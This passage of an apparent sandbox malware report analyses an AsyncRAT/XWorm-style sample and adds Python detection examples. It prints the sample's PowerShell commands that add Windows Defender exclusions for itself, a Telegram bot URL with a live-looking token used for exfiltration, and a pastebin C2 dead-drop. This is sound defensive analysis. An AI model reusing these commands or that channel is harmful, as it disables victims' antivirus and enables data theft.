Source: unknown; Network traffic detected: HTTP traffic on port 49849 -> 443
                                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49849 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49854 version: TLS 1.2
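The memory strings above carry the two channels this sample talks to: a Telegram Bot API URL whose path embeds the full bot token (the operator's credential) plus the sendMessage method and a chat_id, and a pastebin raw URL that XWorm-style clients typically fetch to resolve their real C2 address. The following is an added example, not code from the report or the sample, that turns such string dumps into structured indicators; REPORT_STRINGS is constructed from the strings listed above, truncated fragments included, so the parser also shows which fragments are too short to be useful.

```python
"""Pull C2 indicators out of raw memory strings like the ones listed above.

Added example, not part of the Joe Sandbox report. REPORT_STRINGS repeats the
strings the report printed for 2QaN4hOyJs.exe; treat them as constructed input.
"""
import re
from urllib.parse import parse_qs

# Telegram Bot API: https://api.telegram.org/bot<bot_id>:<secret>/<method>?...
# The whole "<bot_id>:<secret>" is the bot token, i.e. the operator's credential.
TELEGRAM_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)"
    r"/(?P<method>\w+)(?:\?(?P<query>\S*))?"
)
# A pastebin "raw" URL inside a RAT is usually a dead-drop resolver holding the real C2 address.
PASTEBIN_RAW_RE = re.compile(r"https?://pastebin\.com/raw/(?P<paste_id>[A-Za-z0-9]+)")


def extract_indicators(strings):
    """Return {'telegram_bots': [...], 'pastebin_raw': [...]} with duplicates removed."""
    bots, pastes, seen = [], [], set()
    for s in strings:
        for m in TELEGRAM_RE.finditer(s):
            key = ("tg", m.group("bot_id"), m.group("method"))
            if key in seen:
                continue
            seen.add(key)
            query = parse_qs(m.group("query") or "")
            bots.append({
                "bot_id": m.group("bot_id"),
                "token": f"{m.group('bot_id')}:{m.group('secret')}",
                "method": m.group("method"),
                # chat_id may be cut off in a memory dump; report whatever is there.
                "chat_id": query.get("chat_id", [None])[0],
            })
        for m in PASTEBIN_RAW_RE.finditer(s):
            if ("pb", m.group("paste_id")) not in seen:
                seen.add(("pb", m.group("paste_id")))
                pastes.append(m.group("paste_id"))
    return {"telegram_bots": bots, "pastebin_raw": pastes}


# Constructed input: the strings the report lists, including the truncated fragments.
REPORT_STRINGS = [
    "https://api.telegrP",
    "https://api.telegram.org",
    "https://api.telegram.org/bot",
    "https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=77055",
    "https://pastebin.com/raw/4X62dQQ8",
    "https://aka.ms/pscore68",
]

if __name__ == "__main__":
    import json
    print(json.dumps(extract_indicators(REPORT_STRINGS), indent=2))
```

Only the complete bot URL yields an indicator; the bare host and the "/bot" prefix are discarded, and the chat_id comes back as the truncated "77055" exactly as the dump has it. The numeric bot_id is the stable part worth pivoting on, since the same bot can post to different chats. The two TLS 1.2 sessions the report lists (to 149.154.167.220 and 104.20.3.235) are consistent with api.telegram.org and a Cloudflare-fronted pastebin.com, but confirm that from DNS answers or SNI in the capture rather than from the IPs alone.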

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 2QaN4hOyJs.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: System.0.dr, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Window created: window name: CLIPBRDWNDCLASS

Operating System Destruction

Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process information set: 01 00 00 00

System Summary

Source: 2QaN4hOyJs.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Code function: 0_2_00007FF887D16832
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Code function: 0_2_00007FF887D15A86
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Code function: 0_2_00007FF887D10610
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Code function: 0_2_00007FF887D11941
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF887D3247B
Source: 2QaN4hOyJs.exe, 00000000.00000000.1332540332.0000000000E4E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamecheatix loader.exe4 vs 2QaN4hOyJs.exe
Source: 2QaN4hOyJs.exe, 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecheatix loader.exe4 vs 2QaN4hOyJs.exe
Source: 2QaN4hOyJs.exe | Binary or memory string: OriginalFilenamecheatix loader.exe4 vs 2QaN4hOyJs.exe
Source: 2QaN4hOyJs.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2QaN4hOyJs.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2QaN4hOyJs.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2QaN4hOyJs.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2QaN4hOyJs.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: System.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: System.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: System.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2QaN4hOyJs.exe, Settings.cs | Base64 encoded string: 'X/Ewgy+QbSJLs0T7nGLwMR/ReZ21T0NiAd+vtpjLh8PYyb7wl0jMqUfVN2AogCoK'
Source: System.0.dr, Settings.cs | Base64 encoded string: 'X/Ewgy+QbSJLs0T7nGLwMR/ReZ21T0NiAd+vtpjLh8PYyb7wl0jMqUfVN2AogCoK'
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Settings.cs | Base64 encoded string: 'X/Ewgy+QbSJLs0T7nGLwMR/ReZ21T0NiAd+vtpjLh8PYyb7wl0jMqUfVN2AogCoK'
Source: 2QaN4hOyJs.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2QaN4hOyJs.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: System.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: System.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@13/19@13/3
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2948:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Mutant created: \Sessions\1\BaseNamedObjects\KSE8vSJChSxv51Wx
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | File created: C:\Users\user\AppData\Local\Temp\System
Source: 2QaN4hOyJs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 2QaN4hOyJs.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 2QaN4hOyJs.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | File read: C:\Users\user\Desktop\2QaN4hOyJs.exe
Source: unknown | Process created: C:\Users\user\Desktop\2QaN4hOyJs.exe "C:\Users\user\Desktop\2QaN4hOyJs.exe"
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
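The four PowerShell launches above are the sample's defence-evasion step: each one runs with -ExecutionPolicy Bypass and calls Add-MpPreference to exclude, in turn, its own image path, its own process name, the dropped copy in %TEMP% and that copy's process name. The parent-child relationship is the high-fidelity signal here: the process being excluded is the one that spawned PowerShell. The following is an added example, not code from the report or the sample, that scores Sysmon-style process-creation events on exactly that logic; the events are constructed from the command lines listed above plus a constructed benign control and a constructed -EncodedCommand variant, since the same cmdlet is often hidden behind base64.

```python
"""Flag Windows Defender exclusion tampering in process-creation telemetry.

Added example, not code from the Joe Sandbox report or from the sample it
analyses. Events are Sysmon Event ID 1 style dicts (ParentImage, CommandLine)
constructed from the command lines the report lists above, plus a constructed
benign control and a constructed -EncodedCommand variant.
"""
import base64
import re
from pathlib import PureWindowsPath

MPPREF_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
# One -Exclusion* parameter and its argument list, up to the next -Param or end of line.
EXCLUSION_RE = re.compile(
    r"-(?P<kind>Exclusion(?:Path|Process|Extension|IpAddress))\s+(?P<args>.+?)(?=\s+-[A-Za-z]|$)",
    re.IGNORECASE,
)
# powershell.exe accepts unambiguous parameter prefixes, so -ep/-ex/-exec Bypass are equivalent.
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|exec|ex|ep)\s+Bypass\b", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Exclusions under user-writable trees are almost never legitimate administration.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\users\\", "\\programdata\\", "\\public\\")


def normalize(cmd):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so matching sees it."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd


def analyze_event(event):
    """Return [(severity, reason), ...] for one process-creation event."""
    cmd = normalize(event["CommandLine"])
    parent = PureWindowsPath(event.get("ParentImage", ""))
    findings = []
    if BYPASS_RE.search(cmd):
        findings.append(("medium", "powershell launched with -ExecutionPolicy Bypass"))
    if not MPPREF_RE.search(cmd):
        return findings
    for m in EXCLUSION_RE.finditer(cmd):
        kind = m.group("kind").lower()
        for value in (v.strip().strip("'\"") for v in m.group("args").split(",")):
            findings.append(("high", f"Defender {kind} added: {value}"))
            # Self-exclusion: the process that spawned PowerShell whitelists itself.
            if kind == "exclusionpath" and PureWindowsPath(value) == parent:
                findings.append(("critical", "parent excluded its own image path"))
            elif kind == "exclusionprocess" and value.lower() == parent.name.lower():
                findings.append(("critical", "parent excluded its own process name"))
            if kind == "exclusionpath" and any(s in value.lower() for s in USER_WRITABLE):
                findings.append(("high", "exclusion targets a user-writable location"))
    return findings


def max_severity(findings):
    """3 = critical, 2 = high, 1 = medium, 0 = nothing flagged."""
    rank = {"critical": 3, "high": 2, "medium": 1}
    return max((rank[s] for s, _ in findings), default=0)


# Constructed sample telemetry; the first four command lines are the report's own.
_PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
_PARENT = r"C:\Users\user\Desktop\2QaN4hOyJs.exe"
_ENC_PAYLOAD = r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'"
_ENC = base64.b64encode(_ENC_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = {
    "self_path": {"ParentImage": _PARENT, "CommandLine": _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\2QaN4hOyJs.exe'"},
    "self_process": {"ParentImage": _PARENT, "CommandLine": _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2QaN4hOyJs.exe'"},
    "temp_path": {"ParentImage": _PARENT, "CommandLine": _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\System'"},
    "temp_process": {"ParentImage": _PARENT, "CommandLine": _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System'"},
    "benign": {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": _PS + " -NoProfile -Command Get-MpPreference"},
    "encoded": {"ParentImage": _PARENT, "CommandLine": _PS + f" -ep Bypass -enc {_ENC}"},
}

if __name__ == "__main__":
    for name, event in SAMPLE_EVENTS.items():
        print(name, max_severity(analyze_event(event)), analyze_event(event))
```

The first two report events score critical because the excluded path or name equals the parent image; the %TEMP%\System pair scores high on the user-writable location alone, and a correlation with the File created event for C:\Users\user\AppData\Local\Temp\System would lift those too. Get-MpPreference from a shell produces nothing, and the encoded variant is caught only because normalize() decodes the payload before matching, which is the check the plaintext-only rule would miss.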
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
